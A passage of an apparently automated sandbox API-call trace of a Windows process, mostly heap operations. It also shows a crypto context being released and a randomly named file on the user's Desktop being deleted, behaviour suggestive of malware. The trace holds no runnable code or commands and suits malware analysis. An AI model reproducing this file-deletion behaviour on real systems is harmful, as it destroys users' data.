hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0137.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0137.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0137.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0137.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0137.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0137.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0137.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0137.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0137.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0137.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0137.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0137.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0137.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0137.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0137.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e699e8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0137.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0137.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0137.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0137.343] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0137.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0137.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0137.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0137.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0137.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0137.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0137.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0137.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0137.344] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0137.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0137.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0137.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0137.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0137.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0137.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0137.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0137.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0137.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0137.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0137.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0137.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0137.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0137.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0137.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0137.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0137.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0137.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0137.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0137.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0137.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0137.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0137.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0137.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0137.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0137.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0137.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0137.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0137.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0137.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0137.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0137.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0137.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0137.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0137.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0137.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0137.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0137.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0137.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0137.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0137.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0137.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0137.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0137.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0137.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0137.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0137.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0137.346] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0137.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0137.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0137.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0137.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0137.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0137.346] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0137.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0137.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0137.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0137.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0137.346] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0137.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0137.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0137.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0137.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0137.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0137.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0137.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0137.347] FreeLibrary (hLibModule=0x756e0000) returned 1 [0137.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0137.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0137.347] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0137.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0137.347] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0137.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0137.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0137.347] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0137.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0137.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0137.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0137.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0137.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0137.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0137.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0137.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0137.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0137.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0137.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0137.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0137.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0137.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0137.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0137.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0137.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0137.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0137.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0137.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0137.348] CloseHandle (hObject=0x2d0) returned 1 [0137.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0137.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0137.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0137.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0137.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0137.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0137.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0137.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0137.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0137.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0137.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0137.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0137.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0137.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0137.353] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0137.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0137.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0137.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0137.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0137.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0137.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0137.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0137.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0137.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0137.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0137.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0137.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0137.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0137.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0137.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0137.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0137.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0137.354] CloseHandle (hObject=0x2a0) returned 1 [0137.358] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0137.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0137.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0137.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0137.415] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0137.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0137.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0137.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0137.416] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0137.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0137.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0137.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0137.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0137.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0137.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0137.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0137.416] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/AuSKwF8iMWxqYFgPtC.odp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\AuSKwF8iMWxqYFgPtC.odp", lpFilePart=0x8cedf4*="AuSKwF8iMWxqYFgPtC.odp") returned 0x2e [0137.416] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\AuSKwF8iMWxqYFgPtC.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\auskwf8imwxqyfgptc.odp")) returned 0x20 [0137.416] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\AuSKwF8iMWxqYFgPtC.odp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b9e2380, ftCreationTime.dwHighDateTime=0x1d5e66c, ftLastAccessTime.dwLowDateTime=0x677f4ed0, ftLastAccessTime.dwHighDateTime=0x1d5e42f, ftLastWriteTime.dwLowDateTime=0x677f4ed0, ftLastWriteTime.dwHighDateTime=0x1d5e42f, nFileSizeHigh=0x0, nFileSizeLow=0x15985, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="AuSKwF8iMWxqYFgPtC.odp", cAlternateFileName="AUSKWF~1.ODP")) returned 0xa876d0 [0137.452] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\AuSKwF8iMWxqYFgPtC.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\auskwf8imwxqyfgptc.odp")) returned 1 [0137.517] FindNextFileW (in: hFindFile=0xa876d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b9e2380, ftCreationTime.dwHighDateTime=0x1d5e66c, ftLastAccessTime.dwLowDateTime=0x677f4ed0, ftLastAccessTime.dwHighDateTime=0x1d5e42f, ftLastWriteTime.dwLowDateTime=0x677f4ed0, ftLastWriteTime.dwHighDateTime=0x1d5e42f, nFileSizeHigh=0x0, nFileSizeLow=0x15985, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="AuSKwF8iMWxqYFgPtC.odp", cAlternateFileName="AUSKWF~1.ODP")) returned 0 [0137.517] FindClose (in: hFindFile=0xa876d0 | out: hFindFile=0xa876d0) returned 1 [0137.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0137.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0137.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0137.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0137.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0137.518] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0137.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0137.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0137.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0137.518] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0137.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0137.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0137.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0137.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0137.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0137.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0137.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0137.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0137.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0137.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0137.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0137.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0137.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0137.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0137.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0137.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0137.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0137.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0137.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0137.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5e) returned 0x2e563a8 [0137.519] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/AuSKwF8iMWxqYFgPtC.odp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\AuSKwF8iMWxqYFgPtC.odp", lpFilePart=0x8cf650*="AuSKwF8iMWxqYFgPtC.odp") returned 0x2e [0137.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0137.519] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\AuSKwF8iMWxqYFgPtC.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\auskwf8imwxqyfgptc.odp")) returned 0xffffffff [0137.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0137.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0137.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0137.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0137.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0137.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0137.519] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 